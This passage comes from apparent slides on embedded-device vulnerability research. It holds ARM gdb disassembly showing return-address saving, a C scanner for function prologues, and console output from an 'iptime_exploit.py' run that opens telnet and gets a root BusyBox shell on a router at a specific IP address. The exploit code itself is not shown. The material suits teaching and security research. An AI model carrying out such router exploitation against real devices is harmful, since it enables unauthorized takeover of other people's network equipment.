    int sum;
    sum = a+b+c;
    return sum;
}
Example 1 (lr is not saved)
(gdb) disass my_func
Dump of assembler code for function my_func:
   0x00008430 <+0>:  push {r11} ; (str r11, [sp, #-4]!)
   0x00008434 <+4>:  add r11, sp, #0
   0x00008438 <+8>:  sub sp, sp, #28
   0x0000843c <+12>: str r0, [r11, #-16]
   0x00008440 <+16>: str r1, [r11, #-20]
   0x00008444 <+20>: str r2, [r11, #-24]
   0x00008448 <+24>: ldr r2, [r11, #-16]
   0x0000844c <+28>: ldr r3, [r11, #-20]
   0x00008450 <+32>: add r2, r2, r3
   0x00008454 <+36>: ldr r3, [r11, #-24]
   0x00008458 <+40>: add r3, r2, r3
   0x0000845c <+44>: str r3, [r11, #-8]
   0x00008460 <+48>: ldr r3, [r11, #-8]
   0x00008464 <+52>: mov r0, r3
   0x00008468 <+56>: add sp, r11, #0
   0x0000846c <+60>: pop {r11} ; (ldr r11, [sp], #4)
   0x00008470 <+64>: bx lr
End of assembler dump.
(gdb)
Example 2 (lr is saved)
int my_func(int a, int b, int c)
{
    int sum;
    sum = a+b+c;
    printf("hi\n");
    return sum;
}
Example 2 (lr is saved)
(gdb) disass my_func
Dump of assembler code for function my_func:
   0x00008460 <+0>:  push {r11, lr}
   0x00008464 <+4>:  add r11, sp, #4
   0x00008468 <+8>:  sub sp, sp, #24
   0x0000846c <+12>: str r0, [r11, #-16]
   0x00008470 <+16>: str r1, [r11, #-20]
   0x00008474 <+20>: str r2, [r11, #-24]
   0x00008478 <+24>: ldr r2, [r11, #-16]
   0x0000847c <+28>: ldr r3, [r11, #-20]
   0x00008480 <+32>: add r2, r2, r3
   0x00008484 <+36>: ldr r3, [r11, #-24]
   0x00008488 <+40>: add r3, r2, r3
   0x0000848c <+44>: str r3, [r11, #-8]
   0x00008490 <+48>: ldr r0, [pc, #16] ; 0x84a8 <my_func+72>
   0x00008494 <+52>: bl 0x83ac <puts>
   0x00008498 <+56>: ldr r3, [r11, #-8]
   0x0000849c <+60>: mov r0, r3
   0x000084a0 <+64>: sub sp, r11, #4
   0x000084a4 <+68>: pop {r11, pc}
End of assembler dump.
(gdb)
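The two examples differ only in whether the prologue pushes lr, which decides whether a stack overflow in the function can reach the return address. When auditing a firmware binary for unbounded copies, the same check tells you which call sites to fix first. The following is an added example, not code from the slides: a small scanner over gdb "disass" text that reports whether a function saves lr and how many bytes of locals it reserves. The struct and function names are assumptions; the two sample disassemblies are constructed from the prologues shown in example 1 and example 2 above and recognise only the push/sub forms that appear there.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* What an auditor wants to know about a function's prologue. */
struct frame_info {
    int saves_lr;     /* 1 if the prologue pushes lr: the return address sits on the stack */
    int local_bytes;  /* bytes reserved by the first "sub sp, sp, #N" (0 if none) */
};

/* Scan gdb "disass" text for one function and summarise its prologue.
 * Recognises only the two forms that appear on the slides:
 *   push {r11, lr} / push {r11}   and   sub sp, sp, #N */
struct frame_info analyze_prologue(const char *disasm)
{
    struct frame_info fi = {0, 0};
    const char *line = disasm;

    while (line != NULL && *line != '\0') {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char buf[256];

        if (len >= sizeof buf)
            len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';

        /* "push {r11, lr}" saves the return address on the stack */
        const char *push = strstr(buf, "push {");
        if (push != NULL && strstr(push, "lr") != NULL)
            fi.saves_lr = 1;

        /* "sub sp, sp, #N" reserves N bytes for locals (buffers live here) */
        const char *sub = strstr(buf, "sub sp, sp, #");
        if (sub != NULL && fi.local_bytes == 0)
            fi.local_bytes = atoi(sub + strlen("sub sp, sp, #"));

        line = nl ? nl + 1 : NULL;
    }
    return fi;
}

/* Constructed samples: the prologue and epilogue lines of the two my_func
 * variants shown on the slides (example 1 without lr, example 2 with lr). */
const char *EXAMPLE1_DISASM =
    "0x00008430 <+0>:  push {r11} ; (str r11, [sp, #-4]!)\n"
    "0x00008434 <+4>:  add r11, sp, #0\n"
    "0x00008438 <+8>:  sub sp, sp, #28\n"
    "0x00008470 <+64>: bx lr\n";

const char *EXAMPLE2_DISASM =
    "0x00008460 <+0>:  push {r11, lr}\n"
    "0x00008464 <+4>:  add r11, sp, #4\n"
    "0x00008468 <+8>:  sub sp, sp, #24\n"
    "0x00008494 <+52>: bl 0x83ac <puts>\n"
    "0x000084a4 <+68>: pop {r11, pc}\n";

int main(void)
{
    struct frame_info a = analyze_prologue(EXAMPLE1_DISASM);
    struct frame_info b = analyze_prologue(EXAMPLE2_DISASM);

    printf("example 1: saves_lr=%d locals=%d (returns via the lr register)\n",
           a.saves_lr, a.local_bytes);
    printf("example 2: saves_lr=%d locals=%d (return address on the stack)\n",
           b.saves_lr, b.local_bytes);
    return 0;
}
```

A function reported with saves_lr=1 and a local buffer filled by strcpy() is the case the slides describe; one with saves_lr=0 keeps its return address in lr, so a copy overrunning its locals corrupts data but not, by itself, the return path.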
Remote Exploiting IPTIME!
iptime_exploit.py
[root@hackerschool ~]# python iptime_exploit.py 220.118.164.5
[+] UpnP_Port Good
[+] upnp Requesting -80-
[-] Perhaps good
[+] upnp Requesting -23-
[-] Perhaps good
[+] Port Mapping Good
[+] Attacking. Please Wait...
[+] Router Pwned!!
[+] 220.118.164.5 TELNET port Opened
[+] Let's Teleport to it
Trying 220.118.164.5...
Connected to 220.118.164.5 (220.118.164.5).
Escape character is '^]'.

BusyBox v0.60.4 (2011.04.12-07:54+0000) Built-in shell (lash)
Enter 'help' for a list of built-in commands.

/ # ls al
lrwxrwxrwx 1 0   0    11 bin -> /cramfs/bin
lrwxrwxrwx 1 0   0    12 sbin -> /cramfs/sbin
drwxr-xr-x 3 510 504 1024 home
drwxr-xr-x 5 510 504 1024 etc
drwxr-xr-x 3 510 504 1024 dev
drwxr-xr-x 10 0  0    83 cramfs
/ #
Conclusion
Summary of the vulnerability analysis procedure for embedded devices:
Select the target
Obtain the firmware
Understand the file structure
Find binaries that accept user input
Analyze the binaries and detect vulnerabilities
Debug
Develop the exploit
Thank you!